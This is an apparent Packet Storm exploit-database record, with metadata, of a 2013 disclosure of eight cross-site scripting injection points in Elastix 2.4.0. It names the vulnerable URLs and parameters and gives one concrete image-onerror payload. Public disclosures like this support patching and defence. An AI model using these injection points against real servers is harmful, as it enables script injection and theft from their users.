ID PACKETSTORM:124045
Type packetstorm
Reporter Bassem
Modified 2013-11-17T00:00:00
Description
`# Exploit Title: Elastix 2.4.0 Multiple XSS
# Date: [ 17 Nov 2013 ]
# Author: Bassem - Unshield Team
# Contact: Security[at]unshield[dot]net
# Software Link: [http://www.elastix.org/]
# Version: 2.4.0; also works on Elastix 3.0.0 Alpha, where the same libraries exist
# Tested on: 2.4.0
1)http://elastix-server/libs/magpierss/scripts/magpie_debug.php?url=[XSS]
2)http://elastix-server/libs/magpierss/scripts/magpie_slashbox.php?rss_url=[XSS]
3)http://elastix-server/panel/flash/mypage.php?clid=[XSS]
4)http://elastix-server/panel/flash/mypage.php?clid=0&clidname=[base64(XSS)]
5)http://elastix-server/recordings/index.php?login='>[XSS]
6)http://elastix-server/libs/jpgraph/Examples/show-image.php?target="><IMg+srC%3D+x+OnerRoR+%3D+alert(0)>
7)http://elastix-server/vtigercrm/modules/Mobile/index.php?_operation=[XSS]
8)http://elastix-server/vtigercrm/vtigerservice.php?service=[XSS]
Regards/Cordialement
UNSHIELD TEAM
`
{"type": "packetstorm", "published": "2013-11-17T00:00:00", "reporter": "Bassem", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d4be9c4fc84262b4f39f89565918568f"}, {"key": "description", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "href", "hash": "81dd8583958c6a0383354c534088dc2e"}, {"key": "modified", "hash": "31685687dbec3fe4df89efc0b6dcbc70"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "31685687dbec3fe4df89efc0b6dcbc70"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "18bd7d3324d824ed688c51aa7233c936"}, {"key": "sourceData", "hash": "2ae81a36c496dbc307aa5ba8b160d53d"}, {"key": "sourceHref", "hash": "2456e7b614dc92ac085407a4e656e61c"}, {"key": "title", "hash": "a096d7c8623efb6c6002c7c9db0551da"}, {"key": "type", "hash": "6466ca3735f647eeaed965d9e71bd35d"}], "bulletinFamily": "exploit", "cvss": {"vector": "NONE", "score": 0.0}, "sourceData": "`# Exploit Title: Elastix 2.4.0 Multiple XSS \n# Date: [ 17 Nov 2013 ] \n# Author: Bassem - Unshield Team \n# Contact: Security[at]unshield[dot]net \n# Software Link: [http://www.elastix.org/] \n# Version: 2.4.0 , works for same libs exist also on Elastix 3.0.0 Alpha \n# Tested on: 2.4.0 \n \n1)http://elastix-server/libs/magpierss/scripts/magpie_debug.php?url=[XSS] \n2)http://elastix-server/libs/magpierss/scripts/magpie_slashbox.php?rss_url=[XSS] \n3)http://elastix-server/panel/flash/mypage.php?clid=[XSS] \n4)http://elastix-server/panel/flash/mypage.php?clid=0&clidname=[base64(XSS)] \n5)http://elastix-server/recordings/index.php?login='>[XSS] \n6)http://elastix-server/libs/jpgraph/Examples/show-image.php?target=\"><IMg+srC%3D+x+OnerRoR+%3D+alert(0)> \n7)http://elastix-server/vtigercrm/modules/Mobile/index.php?_operation=[XSS] 
\n8)http://elastix-server/vtigercrm/vtigerservice.php?service=[XSS] \n \nRegards/Cordialement \nUNSHIELD TEAM \n`\n", "viewCount": 0, "history": [], "lastseen": "2016-11-03T10:22:53", "objectVersion": "1.2", "href": "https://packetstormsecurity.com/files/124045/Elastix-2.4.0-Cross-Site-Scripting.html", "sourceHref": "https://packetstormsecurity.com/files/download/124045/elastix240-multiplexss.txt", "title": "Elastix 2.4.0 Cross Site Scripting", "enchantments": {"score": {"value": 0.0, "vector": "NONE", "modified": "2016-11-03T10:22:53"}, "dependencies": {"references": [], "modified": "2016-11-03T10:22:53"}, "vulnersScore": 0.0}, "references": [], "id": "PACKETSTORM:124045", "hash": "9db970c1482253f2e44fe64bb45adfb5878a70f1ea91a7684b7080221d0fc66f", "edition": 1, "cvelist": [], "modified": "2013-11-17T00:00:00", "description": ""}
{}